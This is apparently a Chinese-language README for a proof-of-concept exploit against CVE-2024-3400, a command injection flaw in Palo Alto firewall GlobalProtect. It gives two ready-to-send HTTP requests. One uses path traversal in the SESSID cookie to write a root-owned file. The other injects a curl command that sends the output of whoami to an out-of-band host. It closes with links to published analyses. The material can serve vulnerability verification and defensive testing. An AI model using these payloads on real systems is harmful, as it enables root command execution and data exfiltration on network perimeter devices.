CVE-2024-3400的攻击脚本# CVE-2024-3400 漏洞 PoC(验证工具)
## 漏洞描述
CVE-2024-3400 是一个存在于 Palo Alto 防火墙系统中的命令注入漏洞。攻击者通过精心构造的 HTTP 请求,能够在目标服务器上执行恶意命令,甚至获取 root 权限。
## 漏洞复现步骤
1. 发送以下 HTTP 请求:
```http
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```
发送这个请求后,您将在服务器上创建名为 `hellome1337.txt` 的文件,并且该文件会拥有 root 权限。
2. 当您尝试访问该文件时,应该会返回 HTTP 状态码 403(禁止访问),而不是 404(未找到)。
截图展示了此漏洞利用过程中的效果:
## 命令注入示例
为了利用该漏洞执行命令注入,您可以发送如下 HTTP 请求:
```http
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```
此请求会在服务器上执行 `whoami` 命令,并将结果发送到指定的远程服务器(例如:`xxxxxxxxxxxxxxxxx.oast.fun`)。
## 进一步阅读
- [Rapid7 分析](https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis)
- [WatchTowr 实验室分析](https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/)
[4.0K] /data/pocs/0473537b89bed83651060d3c2f51c3a660b76358
├── [ 11K] LICENSE
└── [1.8K] README.md
0 directories, 2 files